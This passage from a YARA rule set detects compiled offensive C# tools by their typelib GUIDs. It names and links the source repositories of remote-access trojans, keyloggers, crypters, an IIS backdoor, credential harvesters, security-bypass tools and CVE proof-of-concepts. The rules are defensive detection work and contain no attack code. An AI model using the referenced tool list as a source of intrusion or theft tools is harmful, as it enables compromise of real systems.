= "243c279e-33a6-46a1-beab-2864cc7a499f" ascii nocase wide $typelibguid2 = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii nocase wide $typelibguid3 = "982dc5b6-1123-428a-83dd-d212490c859f" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AllTheThings { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/johnjohnsp1/AllTheThings" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AddReferenceDotRedTeam { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Lime_Crypter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Lime-Crypter" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BrowserGhost { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/QAX-A-Team/BrowserGhost" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2133c634-4139-466e-8983-9a23ec99e01b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShot { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tothi/SharpShot" author = "Arnim Rupp" date = 
"2020-12-13" strings: $typelibguid0 = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Offensive__NET { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mrjamiebowman/Offensive-.NET" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RuralBishop { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/RuralBishop" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DeviceGuardBypasses { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/DeviceGuardBypasses" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f318466d-d310-49ad-a967-67efbba29898" ascii nocase wide $typelibguid1 = "3705800f-1424-465b-937d-586e3a622a4f" ascii nocase wide $typelibguid2 = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii nocase wide $typelibguid3 = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii nocase wide $typelibguid4 = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii nocase wide $typelibguid5 = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AMSI_Handler { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/two06/AMSI_Handler" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii nocase wide $typelibguid1 = 
"86652418-5605-43fd-98b5-859828b072be" ascii nocase wide $typelibguid2 = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii nocase wide $typelibguid3 = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RAT_TelegramSpyBot { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TheHackToolBoxTeek { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/teeknofil/TheHackToolBoxTeek" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii nocase wide $typelibguid1 = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii nocase wide $typelibguid2 = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii nocase wide $typelibguid3 = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii nocase wide $typelibguid4 = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii nocase wide $typelibguid5 = "295655e8-2348-4700-9ebc-aa57df54887e" ascii nocase wide $typelibguid6 = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_USBTrojan { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mashed-potatoes/USBTrojan" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_IIS_backdoor { meta: description = "Detects c# red/black-team tools via typelibguid" reference = 
"https://github.com/WBGlIl/IIS_backdoor" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii nocase wide $typelibguid1 = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ShellGen { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jasondrawdy/ShellGen" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Mass_RAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Mass-RAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii nocase wide $typelibguid1 = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii nocase wide $typelibguid2 = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Browser_ExternalC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_OffensivePowerShellTasking { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/leechristensen/OffensivePowerShellTasking" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d432c332-3b48-4d06-bedb-462e264e6688" ascii nocase wide $typelibguid1 = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii nocase wide 
condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DoHC2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SpiderLabs/DoHC2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SyscallPOC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SolomonSklash/SyscallPOC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii nocase wide $typelibguid1 = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Pen_Test_Tools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/awillard1/Pen-Test-Tools" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii nocase wide $typelibguid1 = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii nocase wide $typelibguid2 = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii nocase wide $typelibguid3 = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii nocase wide $typelibguid4 = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii nocase wide $typelibguid5 = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii nocase wide $typelibguid6 = "a4043d4c-167b-4326-8be4-018089650382" ascii nocase wide $typelibguid7 = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii nocase wide $typelibguid8 = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii nocase wide $typelibguid9 = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii nocase wide $typelibguid10 = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii nocase wide $typelibguid11 = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii nocase wide 
condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_The_Collection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Tlgyt/The-Collection" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii nocase wide $typelibguid1 = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii nocase wide $typelibguid2 = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii nocase wide $typelibguid3 = "5f19919d-cd51-4e77-973f-875678360a6f" ascii nocase wide $typelibguid4 = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Change_Lockscreen { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nccgroup/Change-Lockscreen" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_LOLBITS { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Kudaes/LOLBITS" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Keylogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BlackVikingPro/Keylogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } /* The CVE-named rules in this set (CVE_2020_1337 below, CVE_2020_0668 and CVE_2019_1253 further on) match the assembly GUID of the named proof-of-concept project, not the vulnerability: a hit identifies a build of that PoC assembly, while actual exploitation of the CVE needs separate evidence (patch level, event logs). */ rule HKTL_NET_GUID_CVE_2020_1337 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = 
"https://github.com/neofito/CVE-2020-1337" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpLogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/SharpLogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AsyncRAT_C_Sharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "619b7612-dfea-442a-a927-d997f99c497b" ascii nocase wide $typelibguid1 = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii nocase wide $typelibguid2 = "37e20baf-3577-4cd9-bb39-18675854e255" ascii nocase wide $typelibguid3 = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii nocase wide $typelibguid4 = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii nocase wide $typelibguid5 = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii nocase wide $typelibguid6 = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii nocase wide $typelibguid7 = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii nocase wide $typelibguid8 = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii nocase wide $typelibguid9 = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii nocase wide $typelibguid10 = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DarkFender { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xyg3n/DarkFender" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = 
"12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } /* The IronKit rule that follows is deliberately disabled (wrapped in a block comment) because of the false positives on IronPython noted inside it; leave it disabled unless the condition is tightened beyond the bare GUID match. */ /* FPs with IronPython rule HKTL_NET_GUID_IronKit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nshalabi/IronKit" author = "Arnim Rupp" score = 50 date = "2020-12-13" strings: $typelibguid0 = "68e40495-c34a-4539-b43e-9e4e6f11a9fb" ascii nocase wide $typelibguid1 = "641cd52d-3886-4a74-b590-2a05621502a4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } */ rule HKTL_NET_GUID_MinerDropper { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/DylanAlloy/MinerDropper" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii nocase wide $typelibguid1 = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDomainSpray { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/HunnicCyber/SharpDomainSpray" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_iSpyKeylogger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mwsrc/iSpyKeylogger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii nocase wide $typelibguid1 = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii nocase wide $typelibguid2 = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii nocase wide $typelibguid3 = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii nocase wide condition: (uint16(0) == 0x5A4D and 
uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SolarFlare { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mubix/solarflare" author = "Arnim Rupp" date = "2020-12-15" strings: $typelibguid0 = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Snaffler { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SnaffCon/Snaffler" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii nocase wide $typelibguid1 = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpShares { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/djhohnstein/SharpShares/" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpEDRChecker { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/PwnDexter/SharpEDRChecker" author = "Arnim Rupp" date = "2020-12-18" strings: $typelibguid0 = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpClipHistory { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/SharpClipHistory" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } 
rule HKTL_NET_GUID_SharpGPO_RemoteAccessPolicies { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Absinthe { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cameronhotchkies/Absinthe" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ExploitRemotingService { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tyranid/ExploitRemotingService" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii nocase wide $typelibguid1 = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii nocase wide $typelibguid2 = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Xploit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/shargon/Xploit" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii nocase wide $typelibguid1 = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii nocase wide $typelibguid2 = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii nocase wide $typelibguid3 = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii nocase wide $typelibguid4 = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii nocase wide $typelibguid5 = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii nocase wide $typelibguid6 = 
"10fe32a0-d791-47b2-8530-0b19d91434f7" ascii nocase wide $typelibguid7 = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii nocase wide $typelibguid8 = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii nocase wide $typelibguid9 = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii nocase wide $typelibguid10 = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PoC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/thezdi/PoC" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "89f9d411-e273-41bb-8711-209fd251ca88" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpGPOAbuse { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FSecureLABS/SharpGPOAbuse" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "4f495784-b443-4838-9fa6-9149293af785" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Watson { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/Watson" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_StandIn { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/StandIn" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_azure_password_harvesting { meta: description = "Detects c# red/black-team 
tools via typelibguid" reference = "https://github.com/guardicore/azure_password_harvesting" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PowerOPS { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fdiskyou/PowerOPS" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Random_CSharpTools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/xorrior/Random-CSharpTools" author = "Arnim Rupp" date = "2020-12-21" strings: $typelibguid0 = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii nocase wide $typelibguid1 = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii nocase wide $typelibguid2 = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii nocase wide $typelibguid3 = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii nocase wide $typelibguid4 = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii nocase wide $typelibguid5 = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii nocase wide $typelibguid6 = "60116613-c74e-41b9-b80e-35e02f25891e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } /* Like the other CVE-named rules in this family, the next rule matches the GUID of a proof-of-concept assembly rather than the vulnerability; a hit says a build of that PoC is present, not that the CVE was exploited. */ rule HKTL_NET_GUID_CVE_2020_0668 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WindowsRpcClients { meta: description = "Detects c# red/black-team tools via typelibguid" 
reference = "https://github.com/tyranid/WindowsRpcClients" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii nocase wide $typelibguid1 = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii nocase wide $typelibguid2 = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii nocase wide $typelibguid3 = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii nocase wide $typelibguid4 = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii nocase wide $typelibguid5 = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii nocase wide $typelibguid6 = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpFruit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rvrsh3ll/SharpFruit" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpWitness { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/rasta-mouse/SharpWitness" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RexCrypter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/syrex1013/RexCrypter" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharPersist { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fireeye/SharPersist" author = "Arnim 
Rupp" date = "2020-12-28" strings: $typelibguid0 = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CVE_2019_1253 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/padovah4ck/CVE-2019-1253" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "584964c1-f983-498d-8370-23e27fdd0399" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_scout { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jaredhaight/scout" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Grouper2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/l0ss/Grouper2/" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CasperStager { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ustayready/CasperStager" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii nocase wide $typelibguid1 = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TellMeYourSecrets { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0xbadjuju/TellMeYourSecrets" author = "Arnim Rupp" date = "2020-12-28" strings: $typelibguid0 = 
